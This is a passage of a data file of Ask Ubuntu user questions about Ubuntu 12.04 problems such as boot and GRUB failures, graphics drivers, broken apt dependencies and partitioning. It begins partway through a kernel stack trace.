nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv005954rm+0x71/0x9c [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv001064rm+0x19f8/0x2860 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv001030rm+0xb26/0xb59 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv001064rm+0x4a/0x2860 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv000938rm+0x1f/0x10b [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _nv001096rm+0x250/0x614 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? rm_ioctl+0x71/0xd9 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? _copy_from_user+0x42/0x60 jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? nv_kern_ioctl+0x151/0x450 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? remove_vma+0x44/0x60 jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? remove_vma+0x44/0x60 jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? nv_kern_ioctl+0x450/0x450 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? nv_kern_unlocked_ioctl+0x20/0x30 [ nvidia ] jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? do_vfs_ioctl+0x79/0x2d0 jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? sys_ioctl+0x6f/0x80 jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? syscall_call+0x7/0xb jul 24 12:48:13 computer kernel : [ 4015.090539 ] [ ] ? verify_pmtmr_rate+0x79/0x95 please help ... more updates when i run google-chrome from the command line i get this message : alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream
167608	how do i change system colors in ubuntu 12.04 ?	i am looking to customize my system , making it look a little more pleasing to my eyes , and i know i have seen an article somewhere , but i ca n't seem to find it anymore , on how do i change the color of the close icon in unity on 12.04 ? does anyone know how i can do this , as well as change other system colors ?
167609	how to create new file without any default file type ?	i am creating a new file either by using in terminal : touch newfilename.someext or in nautilus : file > create new document > empty document the file takes on the type `` plain text document '' and gets associated with the default text-editor . how can i turn-off these 2 actions ? the .somext is a new/unknown extension and i expect the system to show it as an unknown file type . edited august 10 2012 : i noticed that if you have a non-printing binary character in the file , then it will show as type `` unknown '' .
167610	unable to start lightdm but can startx	i am trying to make my own live usb and i have successfully generated an iso file with a newly installed , configured and customized xubuntu 12.04 lts installation . my problem is that , no matter i boot the iso in virtualbox or in grub with loopback , it just can not start the lightdm . when booting , i can see the log messages on the screen , it stucks at stopping system v compablities or configuring network security . and tty7 is frozen ... if i switch to tty1 , i can get a logged-in shell as ubuntu @ ubuntu . the weird thing is : when i type sudo start lightdm or just sudo lightdm , it will switch to tty7 and the screen flashes . then nothing happened . return to tty1 and i can see lightdm running , process xxxx . but the process does not exist . it was just crashed immediately i think . ( that 's why the screen flashes . ) however , when i type startx , i can get into the desktop ! that 's amazing for me . i am not very clear about the relationship between x server and display manager , but i think lightdm is running when i see the desktop ! then , what 's wrong with sudo start lightdm ? i use this command every time i power on my laptop since i have a text parameter added in grub.cfg . it never `` crashed immediately '' . i need to use sudo start lightdm because it gets me into `` xubuntu session '' instead of `` xfce session '' , the prior is more beautiful ... could anyone help ?
167615	how can i setup juju ( maas/openstack ) on two dedicated hosting servers ?	i currently rent two dedicated hosting servers running both ubuntu 12.04lts ( they are i5/i7 with 16gb of ram ) . i would love to turn these two in a pseudo public-cloud on where i could deploy stuff with juju . but i did not managed to find enough information on this : is it possible to setup maas/openstack when i do not own the network ( would an openvpn solution work ? ) . does it mean that i must sacrifice one server to be the orchestra-master ? thanks !
167619	why lubuntu runs fine from usb flash drive as livecd , but is extremely slow when installed on the same usb disk ?	i have a strange problem . i have latest lubuntu 12.04 on my usb flash drive installed as live installation ( livecd mode ) . everything runs fine and smooth , no problem with speed of the system . but when i install lubuntu on this same usb flash drive permanently with installer , after booting to this installed system it is extremely slow . when i run 'top ' command , i see that cpu load is high at 5.2 4.8 4.2 and what is strange - there is a big percentage of cpu in wait state , every time i try to do something in the system the wait percentage jumps to its peak . can anybody help me or give me some hints what to do ? i really like lubuntu and i would like to use it permanently from my usb flash drive , not just in `` try-mode '' as liveusb ... thanks for any help
167621	how do i deactivate at1lc driver after install of alx driver ? ( replacement )	i have had a problem with no wired internet connection in 12.04 and my atheros 8151 ethernet card and i followed the procedure to replace the non-working driver ( at1lc ) with it 's replacement the alx . the procedure seemed to work very well until i re-booted and the original ( at1lc ) driver still appeared in my lsw -c network . the procedure i followed is described in how to install drivers for the atheros ar8161 ethernet controller ? i repeated the procedure three times and each time the process and result were the same . how do i deactivate the at1lc and activate the alx ?
167622	no ubuntu loading option and installation alongside windows vista	i installed ubuntu 12.04 ( from a bootable usb ) alongside my windows vista ultimate operating system . everything during installation went smoothly and at the end i got the message that ubuntu is installed and i need to restart the computer which i did . however , when the computer restarts it automatically goes to windows vista and there is no option to load ubuntu . now the only sign of ubuntu existing on my computer is that the hard drive size is 50gb smaller ( which i allocated to ubuntu during its installation ) . can anyone please guide me what to change to bring the installed ubuntu to life ?
167633	how do i encrypt a user 's home folder having no password ?	the problem i have is that i use ecryptfs to encrypt a user 's home folder , but in order to decrypt it the user must have a password . however , after i encrypt the home folder , i would love to change the user 's password , especially make it a user having no password . in this circumstance , i am not able to log in via that user 's account because of the password difference . what i would like to do is to change the user 's password with no problem or be able to encrypt his folder even if the user has no password .
167634	ubuntu disk partioning issue : not enough space	i have a laptop with a 640 hdd and a 20gb ssd . i have installed the os in the ssd and want to use the hdd to store large files like software , pictures , videos , etc . i installed virtualbox , but after a few minutes i receive an error message telling me there is not enough space on the disk . this is the output from df : filesystem 1k-blocks used available use % mounted on /dev/sdb1 19479720 11169508 7333012 61 % / none 1332276 272 1332004 1 % /dev none 1340408 144 1340264 1 % /dev/shm none 1340408 192 1340216 1 % /var/run none 1340408 0 1340408 0 % /var/lock none 1340408 0 1340408 0 % /lib/init/rw /dev/sda5 9733688 352948 8892500 4 % /boot /dev/sda1 243853300 10379904 221266396 5 % /home extra information : root @ bt : ~ # grep defaultmachinefolder ~/.virtualbox/virtualbox.xml < systemproperties defaultmachinefolder= '' /root/virtualbox vms '' defaultharddiskformat= '' vdi '' vrdeauthlibrary= '' vboxauth '' webserviceauthlibrary= '' vboxauth '' loghistorycount= '' 3 '' / > @ netcoder this means if i will try to install virtualbox it will get installed in the root partition ? @ netcoder i got it now lol i didnt slept for 2 days thats why i feel stupid right now lol . anyways thx for helping .
167637	how to reject an eula when installing packages with apt ?	i wanted to install ubuntu-restricted-extras with apt , but they include ttf-mscorefonts-installer , for which i must accept an eula license . i donât want to , but i ca n't find a way to reject it . there is an 'ok ' button but no 'reject ' . i have tried ctrl-c , q , esc , but it only makes the installer blink and show the license again . closing the terminal or killing the process is not an option because the file lock does n't get freed .
167644	how to fix `` the package lists or status file could not be parsed or opened '' ?	the following error occurs when i start my update manager : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_indicator-multiload_stable-daily_ubuntu_dists_precise_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . i ca n't even update my packages . what might be the problem ? how can i fix it ?
167645	ubuntu 12.04 and nvidia gtx 550 ti	ok i 'm currently trying to install ubuntu x64 server 12.04 onto the following machine : intel core i5-2320 3.0ghz lga1155 6mb 8 gb ddr3 ram , gigabyte z68p-ds3 s1155 intel z68 ddr3 atx m/b , ocz 60 gb ssd , 3x samsung 2tb drives in a raid 5 array ( via m/b ) now what i think is causing the issue is the following : evga geforce gtx 550 ti 951mhz 1gb pci-express hdmi fpb as the server cd works in text mode i have n't had a problem with actually installing ubuntu . partioned with : 1gb /boot ssd , 59gb / ssd , 10gb swap raid5 , ~4tb /home raid5 on a straight boot , you briefly see the grub menu , followed by a blank screen . the keyboard and mouse blink as they are initialised but no sign of life from the screen . followed by a bit of research ( otherwise known as google ) ... booted in quiet splash nomodeset now i have a fully working linux distro at the command prompt . i then proceed to try and update the nvidia drivers with apt-get ( after updating repositories etc ) and rebooting . still the same problem . i also tried reinstalling from the cd and installing said drivers in the install process before grub was installed , still the same symptoms . does anybody have any solutions ? i 'm at my wits end here , i bought this machine to be a linux server / tinkering machine and have just spent 4-5 hours trying to just get a basic install working .
167646	formatting sd card in xubuntu	i just bought a new 8gb sdhc card , but i am not able to create partitions on it . not when i am using gparted , nor when i am using mkfs . when i insert the sd card the following shows up in dmesg : ... [ 8488.662181 ] mmc0 : card lacks mandatory switch function , performance might suffer . [ 8488.839524 ] mmc0 : new sdhc card at address b368 [ 8488.839870 ] mmcblk0 : mmc0 : b368 smi-s 7.54 gib [ 8488.842163 ] mmcblk0 : unknown partition table but when i try to use dd to write an .img file to the sd card a lot of i/o errors show up : ... [ 8639.446903 ] mmcblk0 : error -123 sending status command , aborting [ 8639.446905 ] end_request : i/o error , dev mmcblk0 , sector 460672 [ 8639.446910 ] end_request : i/o error , dev mmcblk0 , sector 460680 [ 8639.446915 ] end_request : i/o error , dev mmcblk0 , sector 460688 ... when i try to create a partition table in gparted the following error also shows up : ... [ 8840.084006 ] mmc0 : timeout waiting for hardware interrupt . [ 8840.084252 ] mmcblk0 : error -110 sending stop command , original cmd response 0x900 , card status 0xe00 does anyone have a clue on what to do to make this work ?
167647	how to connect ipad to ubuntu 12.04 via wifi or cable ( without jailbreak )	my laptop 's os is ubuntu 12.04 and i bought an ipad , i want to transfer files ( movies or reading materials ) to and from my ipad . i tried some works on the internet but they did n't work so if anybody can help me in a straight way i appreciate that .
167650	is there a way for me to talk by webcam with my friends who use windows ?	i moved to ubuntu but my friends are still using windows . i used to talk to them using oovoo and msn , both with my webcam , but now i ca n't . i want to talk to them , but ubuntu does n't have oovoo nor msn . is there a social page or application to videochat with my windows friends ?
167652	how to play games using wine ?	i install game after game through wine but not one game will play after installation . do i need to install more apps or do games just not work on ubuntu 12.04 ?
167660	how do i resume my session ?	i have a desktop computer running ubuntu , which is a very powerful system and i do n't want it on all the time , so i would like to use the suspend feature , but there is one problem : my computer wo n't resume when i press a button on the keyboard or click the mouse . what should i do to fix this problem ? hardinfo_report.html http : //ubuntuone.com/09konkaqa4szjpwphjyazd
167666	need to access nokia 200 phone memory	i want to access my nokia 200 's internal phone memory using ubuntu . how do i do it ? whenever i connect my phone via usb i get 3 options to choose from in my phone nokia suite - > lets me access my phone via nokia pc suite in windows media transfer - > mostly does the same work mass storage - > lets me access only the card in my phone now i want to access my phones internal memory via usb in ubuntu 12.04 .
167669	networking 3 virtual machines	how do i set up a network with three virtual machines using virtualbox and ubuntu 12.04 32-bit so that they all run together ?
167673	something about fcitx-table-boshiamy	recently i 've installed fcitx to replace ibus , but inside this boshiamy table , no matter which version , older 0.1.0-1 ( precise ) or the latest 0.3.1-1 ( quantal ) , all got the same problem : any word with `` z '' as it 's code , all could n't appear normally , the input method will take `` z '' as `` , '' or `` a '' sometimes even `` b '' could someone try to fix it up ?
167682	hibernation error message	during ubuntu hibernation the following messages appear on the screen and they are accumulated until the system is completely restarted . they also can be found in dmesg output . [ 50357.815787 ] [ drm ] nouveau 0000:01:00.0 : 0x7241 : i2c wr fail : -6 [ 50357.819721 ] [ drm ] nouveau 0000:01:00.0 : 0x7253 : i2c rd fail : -6 the hibernation itseld is working good ( after hacking described in this article ) . what do these messages mean and should i do anything to avoid them ? my computer is asus u40s , ubuntu 12.04 lts x64 .
167683	how to add microphone audio into avconv 's video in x11grab mode ?	i want to create some screencast , i am using avconv ( recent ffmpeg counterpart ) for doing so . this is the reference for command i used . i also referred the avconv manual pages . due to some reason i am unable to record audio from microphone into the screencast . what is the -f switch for audio from microphone ? i tried -f jack but it gives an error message . i am not sure whether the microphone audio drivers are installed on my pc . command i used is as follows : avconv -f x11grab -f jack -s hd1080 -r 30 -i 0:0 screencast.mov error message i get is : can not connect to server socket err = no such file or directory can not connect to server socket exec of jack server ( command = `` /usr/bin/jackd '' ) failed : no such file or directory jack server is not running or can not be started [ jack @ 0x9b6dc80 ] unable to register as a jack client 0:0 : input/output error
167686	appropriate size for / root partition	i 'm about to re-install my system . i like to keep a separate /home and / root partitions . i 've been using ( k ) ubuntu for around a year now and my / partition ( almost 36gb ) never climbed over ~13gb of used space . what would you say is the appropriate maximum size one should set a / partition to ?
167688	how to fix `` * : i386 can not be configured because * : amd64 is in a different version '' ?	i 've managed to break apt-get , i think it had something to do with competing versions of libqt between supercollider and skype . now when i try to install anything , i get the following : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . libdbusmenu-qt2 : i386 : depends : libqtcore4 : i386 ( > = 4:4.7.0~beta1 ) but it is not going to be installed libqt4-dbus : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-declarative : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-network : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-script : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql-mysql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xml : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xmlpatterns : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqtgui4 : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed skype-bin : i386 : depends : libqtcore4 : i386 ( > = 4:4.5.3 ) but it is not going to be installed sni-qt : i386 : depends : libqtcore4 : i386 ( > = 4:4.7.3-1ubuntu3~ ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i run apt-get -f install i get : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libxml++2.6-2 libffado2 libconfig++8 libssl1.0.0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libqt4-declarative : i386 libqt4-sql-mysql libqt4-sql-mysql : i386 libqt4-test qdbus suggested packages : libqt4-declarative-folderlistmodel : i386 libqt4-declarative-gestures : i386 libqt4-declarative-particles : i386 libqt4-declarative-shaders : i386 qt4-qmlviewer : i386 libqt4-dev libqt4-dev : i386 the following packages will be upgraded : libqt4-declarative : i386 libqt4-sql-mysql libqt4-sql-mysql : i386 libqt4-test qdbus 5 upgraded , 0 newly installed , 0 to remove and 449 not upgraded . 14 not fully installed or removed . need to get 0 b/1,236 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 183437 files and directories currently installed . ) preparing to replace libqt4-sql-mysql 4:4.8.1-0ubuntu4.1 ( using ... /libqt4-sql-mysql_4 % 3a4.8.1-0ubuntu4.2_amd64.deb ) ... unpacking replacement libqt4-sql-mysql ... dpkg : error processing libqt4-sql-mysql : i386 ( -- configure ) : libqt4-sql-mysql : i386 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-sql-mysql : amd64 is in a different version ( 4:4.8.1-0ubuntu4.2 ) dpkg : error processing libqt4-sql-mysql ( -- configure ) : libqt4-sql-mysql : amd64 4:4.8.1-0ubuntu4.2 can not be configured because libqt4-sql-mysql : i386 is in a different version ( 4:4.8.1-0ubuntu4.1 ) errors were encountered while processing : libqt4-sql-mysql : i386 libqt4-sql-mysql e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i read that i could fix this by installing aptitude and removing and reinstalling broken packages , but i ca n't install it using dpkg .
167690	how do runlevels work ?	i 'm replacing an active directory windows server with a linux one . i have to introduce the linux server onto the network , but without ad services ( like dhcpd , ldap etc ) . so i was hoping to create a runlevel that 'll allow me to bring the linux server up on the network without these services , then , when i 've removed the windows server , i can change runlevels and start ldap etc . i remember reading that runlevels are deprecated - is this correct ? - if so , how can i achieve my goals ?
167693	ca n't boot after kernel upgrade to 3.2.0-27 from 0-26 on dual boot	my system is dual boot win7 / 12.04 /etc/fstab looks ok /boot on sda5 / on sda6 /home on sda7 fdisk -l is fine shows 3 sep logical partitions /dev/sda3 extended ( group container for 5,6,7 /dev/sda5 nnnnn nnnnn 500mg 83 linux < -- grub also here /dev/sda6 nnnnn nnnn 40 gb 83 linux /dev/sda7 nnnnn nnnnn 60 gb 83 linux as listed above , before the attempted upgrade , / , /boot , /home were on 3 separate logical partitions and /etc/fstab looked ok. what seems to have happened in the upgrade is that grub lost track of the 3 separate partitions and could not process a logon from a user whose /home directory was on another partition . /var/logs/auth.log would show a failure for that user when i tried to logon after the upgrade ... lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` rob '' [ system ] rejected send message , 2 matched rules ; type='method_call ' , sender=':1.103 ' ( uid=104 pid=nnnn comm='/usr/lib/indicator-datetime/indicator-datetime-ser ' ) interface '' org.freedesktop.dbus.properties ' member='getall ' error name='unset ' ... . i go to grub menu and go to 'recovery ' for 3.2.0-27 then 'drop into root ' ... if i look for /home there is nothing . if i look for /boot/grub , there is nothing if i then go back to the sub-menu where i dropped into root , selecting 'grub updte bootloader ' this time , i retreive the references to /home and to /boot/grub and everything looks consistent . then , i try to reboot from the internal menu from recovery and it goes to the logon for my account , i give the passwd and it just dies with a back-lit screen . so , im really stuck.. unable to revert to 3.2.0-26 and unable to stitch together the grub components in order to go forward with 3.2.0-27. i do n't think anything is corrupted but grub seems to be confused and i do not know the sequence of commands to use to recovery to where i was on 3.2.0-26 . footnote i wanted solution like 'aaa ' says below where grub update would have been used to somehow restitch the elements of dual-boot back together . matt scared me into a re-install from my usb stick which was vanilla amd64 ( dont think that it had the alternate solution ) . it looked like all the elements were there after using 3.2.0-26 recovery and grub recovery . it looked like grub was there - altho im not sure that it was back on /dev/sda5 where originally put it . there seems to be something very brittle in the dual boot solution where win7 is primary controller of mbr and mbr points to grub on /dev/sda5 . the funny thing is that after i reinstalled , i eventually got to 3.2.0-27 working on my laptop . i did this by doing apt-get update and then by responding to the shaking icon in unity ui for updates . the big update included 3.2.0-27 update that had failed earlier . only this time it worked ? ? i can only say that the outcome of system software upgrades is suspect when you have the dual boot topology where orig win7 mbr forwards to grub on the first of the logical sdaxx partitions created during an install where you choose to create your own partitions . i will be very wary of this situation when i decide whether to apply uprades when unity prompts me .
167694	xubuntu 12.04 thunar deletes files with permission r -- r -- r -- . is it a bug ?	i tried to prevent my digital photos ( .jpg files ) from accidental deletion using chmod 444 *.jpg . all permissions are set and displayed correctly in a terminal ( ls -la ) as well as in thunar 's file properties > permissions . the files are displayed with a lock symbol . even though , whenever i press `` delete '' , the marked file is moved to trash . my expectation was that files without write permission could not be moved to trash . is it a bug or am i just wrong assuming that moving a file requires write permission ?
167696	how do i configure pidgin to allow video chat with people using wlmessenger ?	i have a windows live id and i use it to talk with my friends , who use windows live messenger 2009 or 2011 . i 've adopted pidgin as my main conversation client because it is universal and it is cross-platform . however i still ca n't have video conversations with my contacts , the options are all grey and i ca n't configure anything . how do i configure pidgin to be able to make video and audio conversations with windows live messenger users ? is there any missing plugin ?
167713	java wait ( ) and sleep ( ) not behaving correctly on a pariticular ubuntu machine	i have a very strange java issue which occurs only on a particular computer running ubuntu . when i call the wait ( timeout ) function it always waits exactly 1000ms less than the time out amount i specify . the sleep ( ) function behaves even more bizarrely - it sleeps an amount of time that seems to have nothing to do with that specified . i have written some test code ( listed below ) and run on two computers both with ubuntu installed . in one which is running 11.04 it behaves exactly as expected . on other computer which is running 10.04 , i get the problems described above . surely its not because its running an older version ? both are 64bit architectures . i am stumped as to what could be causing such strange behavior . any help much appreciated des public class test { public static void main ( string args [ ] ) throws exception { integer timeout = new integer ( args [ 0 ] ) ; for ( ; ; ) { long start = system.currenttimemillis ( ) ; system.out.println ( `` waiting : `` + timeout ) ; synchronized ( timeout ) { try { timeout.wait ( timeout ) ; // uncomment below to try sleep option // thread.currentthread ( ) .sleep ( timeout ) ; } catch ( interruptedexception e ) { } } system.out.println ( `` time : `` + ( system.currenttimemillis ( ) - start ) ) ; system.in.read ( ) ; } } }
167714	12.04 does not boot from the disk after installation	installed ubuntu on hp xw4600 workstation using cd not usb . but after installation it does not boot from hard drive . during installation it showed : the entire disk will be used : /dev/mapper/isw_digjcabegb_volume0 ( ext4 ) 250.1gb running “grub-install /dev/mapper”… error pop-up : unable to install grub in /dev/mapper executing ‘grub-install /dev/mapper’ failed . this is a fatal error . then another error : sorry , an error occurred and it was not possible to install the bootloader at the specified location . how would you like to proceed ? choose a different device to install the bootloader on : /dev/mapper i choose /dev/mapper/isw_digjcabegb_volume0 from the drop down menu and it gave me another error saying the at it failed again and this is a fatal error . then it said installation complete and i need to restart the computer .
167715	swappiness setting ignored in systcl.conf	my ubuntu 12.04 x64 on dell xps 15 with 8gb of ram has been really sluggish . after some searching i came across post about swappiness . i noticed that swappiness on my system was reported as 0 which means swapping should only start when memory is all used and yet is was actually acting much the same as when swappiness is 60 . i set swappiness to 10 using : echo 10 > /proc/sys/vm/swappiness and update /etc/sysctl.conf with : vm.swappiness = 10 after rebooting i notice that swappiness is reported as 0 again with same sluggish performance . i ran echo 10 > /proc/sys/vm/swappiness and the performance improved remarkably . i rebooted again and check swappiness , it was reported as 0 again . i executed sudo sysctl -p and could see the values from sysctl.conf take effect . it seems that the values from /etc/sysctl.conf is ignored on boot . i have a notebook with ubuntu 12.04 32 bit and i also applied the same configuration . on the notebook the changes do take effect as expected and remain after a reboot . has anyone come across this kind of problem ?
167717	ubuntu thinks my desktop is a laptop	ubuntu thinks my desktop is a laptop . i looked for answers on the interweb , but nada . i 'm running 12.04 .
167718	new motherboard , windows drivers ?	perhaps it 's a silly question but i 've recently purchased a new motherboard and of course it came with a cd with it 's drivers only for windows systems ( you know , the autorun cr @ p and all that ) so , should i somehow try to obtain these drivers from the vendor for my linux system or is that not necessary since the os installation will take care of it by itself ?
167726	unity launcher fails to auto-hide after 15 minutes of use	my unity launcher is set to auto-hide and hides however , about 15 minutes into using it , it just stops hiding and sits on top of my windows . i see here many are experiencing a problem with the launcher not coming back from auto-hide , ( this is the opposite of my issue ) as mine just stops auto-hiding is there a way i can reset the unity launcher so i can go back to auto-hide working again ? i prefer a permanent solution , as it happens every time i use it .
167728	how do i remove google chrome which is not starting anymore ?	i have tried to make google chrome run as root using this tutorial but now simply google chrome wo n't start . if i try from terminal with google-chrome i get : root @ ubuntu : ~ # google-chrome segmentation fault ( core dumped ) if i try to uninstall from the software center , it simply hangs when i click on installed software . i tried apt-get purge but with no success . what do you suggest ?
167733	grub problem , boot-repair not working	i am using a wubi installation installed through windows 7 . i have lots of problem with grub and nothing is working . i have important files in the partition . i can boot through a live cd if necessary . here 's the pastebin link to boot-repair . http : //paste.ubuntu.com/1109188
167744	can i disable the mouse for lightdm ?	lightdm is having major problems with the xserver and generic graphics driver on ubuntu 12.04 lts for me , and i really do n't like the look and feel of gdm or lxdm , so i just want to disable the mouse on the lightdm login screen instead , to fix the jittery mouse problem and force guests to learn the arrow key method instead . is there a way i can do this ?
167747	are there better fglrx drivers ?	i have a radeon hd 4770 , the problem is that when i install the fglrx drivers my computer becomes laggy as hell . without them installed i can watch hd video ( better than in windows with its official drivers actually ) , flash works fine and my ui is fast as . but when they are install hd video goes down to about 5 fps , flash is slow and audio is out of sync and my ui is laggy . the only problem with not having the fglrx drivers installed is i ca n't get true 3d games to work . stuff my core 2 duo can handle run fine but the games that really require a punch get about 2 fps . i did a bit of reading and heard that others have the same problem but also that it has not always been the case and some have found a way to install an older version of the drivers that runs fine . so my question is are there any better fglrx drivers ?
167748	restore from ubuntu one	one of these days iâ´m going to reăżnstall ubuntu 12.04 completely from scratch . how can i then get my syncronized files back on my pc ? is there a restore option ? thank you in advance .
167749	gparted moved linux partition -- no longer boots	i have a macbook pro with mac osx installed and ubuntu 12.04 . i wanted to resize my ubuntu partition , so i booted to a 10.04 livecd and used gparted to `` move/resize '' my ubuntu partition . unfortunately , i think gparted defaults to moving it 1000mib to the right ( i.e. , adds 1000mib of unallocated space to the left , and moves the partition right ) , something i did n't realize until after i had started the process . in addition to doing this , i reduced its sized by ~10gib ( 9.77gib in the screenshot ) from the right , and added an ext3 partition in that unallocated space ( i 'm trying to do linux from scratch ) how can i repair my system so that i can boot my ubuntu 12.04 system ? perhaps it is something to do with grub ? i use the refit boot manager , so everytime at boot , i have the option to load either osx or linux . i have already gone through the option to sync/update the mbr in refit . here is a screenshot of gparted from my livecd booted up after the move : something very fortunate , though , is that in file browser , in the left-hand panel , i can mount the `` 132 gb filesystem '' , which is my 12.04 filesystem which i moved and can no longer boot . i can browse it , and read files from it . here is a screenshot :
167752	list of supported graphics cards for ubuntu 10.04 lts 64bit	i 'm running ubuntu 10.04 lts 64bit on an intel i7-3700 system , and i 've just found out the hard way that my intel hd 4000 integrated graphics is not supported on the os . because of this , my dual monitor setup does n't work , nor am i getting native resolution on my monitors . i do n't need fancy 3d graphics , just need it to work and get native resolution on my 2 monitors and support an extended desktop on my dual monitor setup ( 1 connected to vga , the other to dvi ) . i 'm thinking of getting a cheap graphics card to circumvent this problem . is there a list of graphics cards/chips by ati/nvidia/etc that are well supported on ubuntu 10.04 lts 64bit out of the box ? thanks .
167754	document tabs in texmaker	is there any way to get texmaker to display the currently open documents in tabs ( like every other program ) instead of a drop down menu ?
167757	tp-link tl-wn727n installation	i have a tp-link tl-wn727n wireless adapter and have been trying to install it for nearly a week now . i 'm new to ubuntu and need help . if anyone could post an idiot guide on installing this thing i would greatly appreciate it .
167761	how do i assign a string as a keyboard shortcut ?	i 'd like to assign a frequently used string to a shortcut key , so when i press it , it types it in whatever application i 'm in . so for example , when i type shift-f12 , it types `` this is wonderful ! '' in whatever gnome app i 'm in at that time .
167763	update grub or grub2 ?	i 'm making some changes on my grub file under /etc/defaults/grub in some tutorials i have sudo update-grub and others sudo update-grub2 what is the difference ?
167767	windows 7 virtual box	if i install ubuntu along side my windows 7 installation can i then boot into the ubuntu and launch the windows 7 via the virtual box ? or does the windows os have to be installed via the virtual box to work ?
167769	how to disable keyboard shortcut list on holding super key ?	using compizconfiguration settings manager ( ccsm ) , i 've assigned hold super key + roll mouse button to zoom in/out . when i hold super key it by default shows shortcut list on ubuntu 12.04 . i want these two process i.e . zoom in and appearance of shortcut list not to occur simultaneously . i did not find any useful tip on google .
167770	ubuntu 12.04 blank/empty desktop issue	i just installed ubuntu 12.04 in my dell dimension c521 . however , its blank/ empty desktop , no launch bar , task bar or anything.. its just a wall paper there . i tried to log in as ubuntu 2d or anything , but its remain in the login screen . if i am using guest account . then i am able to access to the blank desktop again . i am able to enter to terminal through pressing `` ctrl+alt+f1 '' but i have no idea what to do next . i am a newbie in ubuntu . please guide me step by step to solve this . thanks .
167771	libreoffice file- > new overlays file menu	ubuntu 12.04 , i have a dual screen setup , left laptop screen ( 1st monitor ) , right 24 inch display ( 2nd monitor ) when i position libreoffice in the top left corner of the 2nd monitor and go into the file menu , the dropdowns of new , recent documents etc are overlaid over my file menu instead of being put to the right . see screenshot http : //twitpic.com/abfcaw is there a fix for this ?
167772	ubuntu requiring usb stick to boot each time	i installed ubuntu 12.04 from a usb stick . when i shut down , to boot ubuntu up again , i must boot from usb . how can i fix this so that the usb stick is not required to boot ?
167774	which partition is the ubuntu ?	i am encrypting my entire ubuntu partition with truecrypt , but i am not sure which one is the ubuntu partition ? i have dual boot ubuntu with the other being windows vista which has basically no information on it anymore . here 's a picture of the partitions :
167778	dualboot ubuntu w/ windows : deleting windows	so basically i started with windows vista then decided i want ubuntu . now i have dualboot using both of them , and want to delete windows without starting over . and because i 've tried the usb boot to replace windows but got an error , that i could n't find an answer to . is it possible at all ? simplified version : i start with a add b so i got ab now now i want to delete a and only have b
167780	boot error while booting ubuntu with usb	i know this is my 3rd question today , but every other question of mine has been so nicely answered here.. so why not ? quick story quick , i get ubuntu on 4gb usb then run the the ubuntu thing and it restarts my computer so i can boot with usb . i do so , and after i press f12 then go down to usb it says boot error when i press it .
167784	how to resolve e : internal error when using apt-get remove ?	i use : apt-get remove to remove some software , but it displays : error : e : internal error , no file name for libssl1.0.0 . i also try this to resolve the error : wget http : //launchpadlibrarian.net/102991621/libssl1.0.0_1.0.0e-2ubuntu4.5_i386.deb sudo dpkg -i libssl1.0.0_1.0.0e-2ubuntu4.5_i386.deb but it also gives an error : libssl1.0.0 : i386 1.0.0e-2ubuntu4.5 can not be configured because libssl1.0.0 : amd64 is in a different version ( 1.0.1-4ubuntu5.3 ) i want know the correct way to solve this problem .
